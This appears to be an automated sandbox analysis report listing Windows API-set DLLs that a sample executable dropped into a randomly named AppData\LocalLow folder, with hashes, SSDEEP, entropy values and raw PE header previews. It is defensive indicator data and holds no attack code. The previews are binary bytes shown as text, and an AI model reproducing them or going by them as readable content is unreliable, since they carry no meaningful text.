                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18232
                                                                                                                                                  Entropy (8bit):7.174986589968396
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                                                                                                  MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                                                                                                  SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                                                                                                  SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                                                                                                  SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17856
                                                                                                                                                  Entropy (8bit):7.076803035880586
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                                                                                                  MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                                                                                                  SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                                                                                                  SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                                                                                                  SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.131154779640255
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                                                                                                  MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                                                                                                  SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                                                                                                  SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                                                                                                  SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20792
                                                                                                                                                  Entropy (8bit):7.089032314841867
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                                                                                                  MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                                                                                                  SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                                                                                                  SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                                                                                                  SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.101895292899441
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                                                                                                  MD5:D500D9E24F33933956DF0E26F087FD91
                                                                                                                                                  SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                                                                                                  SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                                                                                                  SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18232
                                                                                                                                                  Entropy (8bit):7.16337963516533
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                                                                                                  MD5:6F6796D1278670CCE6E2D85199623E27
                                                                                                                                                  SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                                                                                                  SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                                                                                                  SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19248
                                                                                                                                                  Entropy (8bit):7.073730829887072
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                                                                                                  MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                                                                                                  SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                                                                                                  SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                                                                                                  SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19392
                                                                                                                                                  Entropy (8bit):7.082421046253008
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                                                                                                  MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                                                                                                  SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                                                                                                  SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                                                                                                  SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.1156948849491055
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                                                                                                  MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                                                                                                  SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                                                                                                  SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                                                                                                  SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17712
                                                                                                                                                  Entropy (8bit):7.187691342157284
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                                                                                                  MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                                                                                                  SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                                                                                                  SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                                                                                                  SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17720
                                                                                                                                                  Entropy (8bit):7.19694878324007
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                                                                                                  MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                                                                                                  SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                                                                                                  SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                                                                                                  SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18232
                                                                                                                                                  Entropy (8bit):7.137724132900032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                                                                                                  MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                                                                                                  SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                                                                                                  SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                                                                                                  SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20280
                                                                                                                                                  Entropy (8bit):7.04640581473745
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                                                                                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                                                                                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                                                                                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                                                                                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.138910839042951
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                                                                                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                                                                                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                                                                                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                                                                                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19248
                                                                                                                                                  Entropy (8bit):7.072555805949365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                                                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                                                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                                                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                                                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18224
                                                                                                                                                  Entropy (8bit):7.17450177544266
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                                                                  MD5:BABF80608FD68A09656871EC8597296C
                                                                                                                                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                                                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                                                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18232
                                                                                                                                                  Entropy (8bit):7.1007227686954275
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                                                                                                  MD5:0F079489ABD2B16751CEB7447512A70D
                                                                                                                                                  SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                                                                                                  SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                                                                                                  SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                                                                                                  Malicious:false
